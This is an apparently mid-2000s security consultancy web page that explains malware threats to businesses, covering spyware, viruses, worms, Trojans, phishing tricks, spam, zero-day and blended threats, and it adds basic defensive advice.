Malware Threats Against Your Business

A Brief Taxonomy of the Bad Stuff That's Out to Get You

 

Spyware - Viruses, Worms and Trojans - Phishing - Spam

Additional Info - Zero Day Threats, Blended Threats, etc.

"And that goes for your little dog, too!"

 

New Trends In Hacker Attacks

Hackers are getting more personal. The potential financial gain from "owning" PCs is getting more and more interesting, and attackers are concentrating on bots and backdoor Trojans. These two are the most active categories at the moment.

And how do they infect users? With increasingly sophisticated code. The cyber-mob uses personalization techniques to more effectively attack those who visit compromised websites. In the last 12 months, the number of sites that use this new approach has skyrocketed. They look at the browser you are using, your IP address, and then kick off code that exploits known vulnerabilities for those environments. In other words, personalized multiple exploits and payloads that sit on malicious websites. And recently, often the payload gets delivered in two steps. First, a system is infected with a so-called dropper. This code is then activated later and downloads the actual malicious payload.

Other still popular vectors that spread malware are email and P2P (peer-to-peer) networks. It is interesting to note that rootkit attacks against Windows PCs have gone down during the last six months. Companies are being attacked with the goal of data theft, and hackers now create malicious code that targets specific organizations for data that can be used for financial gain. They use blended phishing, spam, bot nets, Trojans, and zero-day threats, using global networks that execute coordinated attacks. PCs infected with bots increased by 11% and there are now over 6 million PC zombies. According to Symantec, in the first six months of last year there were on average 6,110 DDoS attacks a day, close to 40% of which targeted ISPs, and CERT says the number is not dropping.

Obviously you can expect new exploits for Vista, not just the OS but also the third party apps running on it, and since virtualization has taken flight, you can count on those being targeted for penetration too. So, layer your defenses, stay alert, and keep 'Best Practices' IN PRACTICE!

Spyware

The most recent widely accepted definition of spyware is:

    Technologies deployed without appropriate user consent and/or implemented in ways that impair user control over:

    Material changes that affect their user experience, privacy, or system security
    Use of their system resources, including what programs are installed on their computers; and/or
    Collection, use, and distribution of their personal or other sensitive information.

Now, most inexpensive firewalls and antivirus packages won’t do much to stop this type of intrusion. This particular class of intrusion is one that is in most cases benign – more of a nuisance than anything else. But there’s a dark side to spybots / spyware that needs to be examined. This stuff  - most of the time – tracks your website browsing habits and sends that info back to certain web-based advertisers. That’s why you get those never-to-be-sufficiently damned pop-ups and other sorts of intrusive adverts. Someone knows where you’ve been and gears their advertising accordingly. Getting spam? This may be one of the reasons.

 

Often, you don't even realize that you've installed these apps because they either piggyback on free software that serves another purpose (say, the ad-serving app Cydoor, which is included with the Kazaa file-sharing program).  They are often downloaded and installed via nefarious Web sites (notice a new default home page or search engine for your Internet Explorer?). The end result is that your browser may default to unusual search-engine sites or produce odd search results, and you may see exponential growth in the number of pop-up ads that litter your desktop while you surf.

 

In practical terms, you now have one or more "live" servers sitting on your PC shoveling information about you and your surfing habits out the back door. These tiny ‘servers’  can be hijacked by knowledgeable bad guys and can be used for any other purpose they see fit. This, folks, is not a Good Thing. Check out  the Effective Measures section of this website and the online Spyware Guide for more useful information concerning this threat.

Viruses, Worms and Trojans

Today, there are over 50,000 known viruses with another 200 to 800 discovered each month. Virus infection have increased steadily from 1 per 100 computers in 1996 to 9 per 100 systems in 2003 according to the International Computer Security Association (ICSA) Labs 6th Annual Computer Virus Prevalence Survey.  ICSA also reports that over 99% of all companies have been infected with at least one virus in the last 12 months - and that over half have experienced a virus disaster.

Phishing (don't get hooked!)

Phishing is a criminal activity using social engineering techniques. Phishers attempt to fraudulently acquire sensitive information, such as passwords and credit card details, by masquerading as a trustworthy person or business in an electronic communication. Phishing is typically carried out using email or an instant message, although phone contact has been used as well. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, and technical measures.

Phishing techniques

Most methods of phishing use some form of technical deception designed to make a link in an email (and the spoofed website it leads to) appear to belong to the spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers, such as this example URL, http://www.yourbank.com.example.com/. Another common trick is to make the anchor text for a link appear to be a valid URL when the link actually goes to the phishers' site.

An old method of spoofing links used links containing the @ symbol, originally intended as a way to include a username and password in a web link (contrary to the standard). For example, the link http://www.google.com@members.tripod.com/ might deceive a casual observer into believing that the link will open a page on www.google.com, whereas the link actually directs the browser to a page on members.tripod.com, using a username of www.google.com: the page opens normally, regardless of the username supplied. Such URLs were disabled in Internet Explorer, while the Mozilla and Opera web browsers opted to present a warning message and give users the option of continuing to the site or canceling.

A further problem with URLs has been found in the handling of Internationalized domain names (IDN) in web browsers, that might allow visually identical web addresses to lead to different, possibly malicious, websites. Despite the publicity surrounding the flaw, known as IDN spoofing or a homograph attack, no known phishing attacks have yet taken advantage of it. Phishers have taken advantage of a similar risk, using open URL redirectors on the websites of trusted organizations to disguise malicious URLs with a trusted domain.[

Once the victim visits the website the deception is not over. Some phishing scams use JavaScript commands in order to alter the address bar. This is done either by placing a picture of the legitimate entity's URL over the address bar, or by closing the original address bar and opening a new one containing the legitimate URL.

In another popular method of phishing, an attacker uses a trusted website's own scripts against the victim. These types of attacks (known as cross-site scripting) are particularly problematic, because they direct the user to sign in at their bank or service's own web page, where everything from the web address to the security certificates appears correct. In reality, the link to the website is crafted to carry out the attack, although it is very difficult to spot without specialist knowledge. Just such a flaw was used in 2006 against PayPal.

Not all phishing attacks require a fake website. In an incident in 2006, messages that claimed to be from a bank told users to dial a phone number regarding a problem with their bank account. Once the phone number (owned by the phisher, and provided by a Voice over IP provider) was dialed, prompts told users to enter their account numbers and PIN.

Phishing Attack Anatomy

Spam

In February of 2007, Australia-based Marshal's Threat Research and Content Engineering Team reported spam volume is at its highest peak ever. Spam has increased 280% since just last October. The report went on to note that if the surge continues apace, 90% of all e-mail will be junk.

That's a whole lot of unwanted e-mail. And spam isn't just a nuisance; it's also a time waster and a productivity reducer for business. Of course, it's inexpensive for the spammers to send, and they may reap significant financial benefits from selling their "wares." However, a good number of those unsolicited messages are scams, which, again, wastes the time and money of the unsuspecting.

In addition to installing and using spam filters, you can protect yourself from this sea of garbage. Here are some tips to help keep the growing wave of unwanted messages from flooding your inbox.

  • Obscure your e-mail address. Spammers use special programs that extract e-mail addresses from Web sites and Usenet postings. To avoid ending up on a spammer's mailing list when you post to a Web forum or a newsgroup, you can obscure your e-mail address by inserting something obvious into it. So if your e-mail address is xyz@yahoo.com, change it to xyz@yah[delete_this]oo.com. Or, try something like this: "xyz at yahoo dot com."

  • Don't reply to spam messages, not even to reply to be "removed." Often the instructions are fake, or they're a way to collect more addresses. Replying confirms to the spammers that your e-mail address is active, and you may receive even more junk mail.

  • Remove your e-mail address from your Web site's pages and offer a Web-based mail form instead. That prevents spammers' robots from harvesting e-mail addresses and putting them on their mailing lists. Contact-Us-Online.com can provide you with such a script free of charge.

Don't open spam. Many pieces of spam contain HTML code which will open a connection to a Web server operated by the spammers. When you connect, you have verified that you opened the message. That informs the spammers that they have a good e-mail address, which -- you guessed it -- results in them sending you even more spam. Delete spam without opening it. Therefore, don't use your e-mail program's preview pane. Previewing spam is the same as viewing it.

Additional Information

Zero Day Threats

A zero-day (or zero-hour) attack is a computer threat that exposes undisclosed or unpatched computer application vulnerabilities. Zero-day attacks can be considered extremely dangerous because they take advantage of computer security holes for which no solution is currently available.

Attack vectors

Malware writers can exploit zero-day vulnerabilities through several different attack vectors. Sometimes, when users visit rogue Web sites, malicious code on the site can exploit vulnerabilities in Web browsers. Web browsers are a particular target for criminals because of their widespread distribution and usage. Cybercriminals can also send malicious e-mail attachments via SMTP, which exploit vulnerabilities in the application opening the attachment. Exploits that take advantage of common file types are numerous and frequent, as evidenced by their increasing appearances in databases like US-CERT. Criminals can engineer malware to take advantage of these file type exploits to compromise attacked systems or steal confidential data.

Vulnerability windows

Zero-day attacks can occur because a vulnerability window exists between the time a threat is released and the time security vendors release patches.

For viruses, Trojans and other zero-day attacks, the vulnerability window follows this timeline:

  • Release of new threat/exploit into the wild
  • Detection and study of new exploit
  • Development of new solution
  • Release of patch or updated signature pattern to catch the exploit
  • Distribution and installation of patch on user's systems or updating of virus databases

This process can often last hours, during which networks experience the vulnerabilty window. One report estimates the 2006 vulnerability window at 28 days.

Trojans vs. Worms

We don’t often think about what differentiates a virus from a worm. We just know that they create huge difficulties. For most folks, the differences don’t matter, but for those of us who must defend against them, knowledge is a great weapon. A Trojan program is much like the Trojan horse from which it gets its name. It could be a program that claims to do one thing, but it actually does something else, or it could be a program you don't even know is on your computer. Trojans and another class of program called 'spyware' can do many things, including reporting your passwords and other information back to the program's author, or even allowing someone else to take control of your computer. Antivirus programs can detect some Trojans, but not all. The good news is that there are remedies available to help you detect and remove these threats to the privacy and the security of your home network. In today’s environment and at a minimum, it takes a combination of a local software firewall and a good anti-virus program to provide a decent level of security.

What's the difference? Two of the things that distinguish viruses and worms are attack vector and mode of propagation. These system-wreckers/hijackers operate as follows:   

Virus Attack Vector: A virus requires interaction such as a your reading an email and clicking an attachment (as found in the "I Love You" virus), opening a .zip file, clicking a hyperlink, or reading an attachment. The machine won’t get sick unless the you perform a task -- not an ideal hacker entry method. A hacker typically wants to break into machines without needing a user at the console to take the intended action.

Virus Propagation: For a virus to propagate, the infected machine sends an email to others who perform tasks, which results in making their machines sick with a virus.

Worm/Trojan Attack Vector: A worm takes advantage of vulnerability on an un-patched computer system (i.e. the Blaster Worm that attacks machines without the MS03-026 patch). A worm doesn’t require you to take action in order to compromise the computer. A computer plugged into the network can be attacked by the simple act of turning it on - a hacker’s dream. This method gives hackers access to server machines and work stations at any time without needing a user to do a thing. 

Worm/Trojan Propagation: After a worm has compromised the system, it can propagate to other systems without user interaction. The nasty result is a worm traversing the Internet in a matter of hours, infecting numerous machines.

Viruses:

  • Require user interaction.
  • Propagate more slowly than worms because of the need for human interaction.
  • Primarily attack workstations, as users must be on the targeted machine to initiate the virus infection.
  • Are not the primary mechanism of attack of hackers.
  • Can be intercepted and destroyed via anti virus software.
  • Do not leverage vulnerabilities; they mostly rely on end users making un-intelligent decisions (like opening an email attachment from an unknown person).
  • Are single-ended in nature - that is,  they tend to infect using one mechanism and then infect subsequent machines using the same mechanism.

Worms and Trojans:

  • Do not require any interaction.
  • Propagate quickly, because there is no need for human interaction.
  • Can attack any un-patched machine that is on the network - both servers and workstations.
  • Are a hacker’s best friend.
  • Cannot be easily detected by anti virus software.
  • Require the presence of a security vulnerability on the machine to compromise it.
  • May obtain confidential data from that machine (like usernames and passwords), once the worm has compromised the machine, that can be used to compromise other machines - even machines that are patched (i.e. Code Red, Nimda).
  • Can be multi-partite - meaning they can attack a machine via one vector and then attack subsequent machines using any of 25+ other attack vectors (worms can enter using Blaster and then attack other machines via open file shares, Nimda, Code Red, Slammer, etc.).  See Blended Threats below

Blended Threats. Blended threats are a class of attack that make use of multiple methods and techniques to transmit and spread an attack on your and other computer systems and networks. It takes a layered defense in order to defeat such attacks.

Intrusion. Not all attacks are destructive. We hear about viruses and email worms, but it's the events that don't come to public attention that should concern us the most. The threats mentioned earlier are inconvenient at best, destructive at their worst. A virus might trash your hard drive; an email-propagated worm might clog your email server. But an intruder may have other objectives: patient records, bank account numbers, passwords, social security numbers, credit card numbers - in short, they're after any and all private info that you might have lying around on your system. And believe me, if you've ever engaged in on-line banking or made a purchase on-line (who hasn't, these days?), traces of that transaction still exist on your system. And it's easy pickings for the adept intruder. Their objective - identity theft. The information that a hacker might glean from your system is usually bundled with that of other victims and sold to criminal enterprises from Eastern Europe to South East Asia. The latest spin on identity theft is that those who purchase illegally obtained information will cobble together data from several people's files to create whole new identities - for purposes that can only bode ill for its victims.

Is Any of This Hard to Do? How easy is it to find systems to plunder?  Unfortunately, it's not that hard to do. The array of tools available for discovering and exploiting a vulnerable network - your vulnerable network - is nothing short of amazing. The are literally hundreds of public websites that offer a wide selection of tools and techniques for locating, cracking and exploiting every sort of system. The existence of private sites and boards is even larger.

The bottom line: ignoring these threats is not an option. Protect yourself and your information assets.

Back to Educate Me

Back to Top

  | Sat Services | Networks | Data Security | Products | Solutions |                                                | Educate Me | Home |  
Copyright 2003 - StarLAN Consulting Services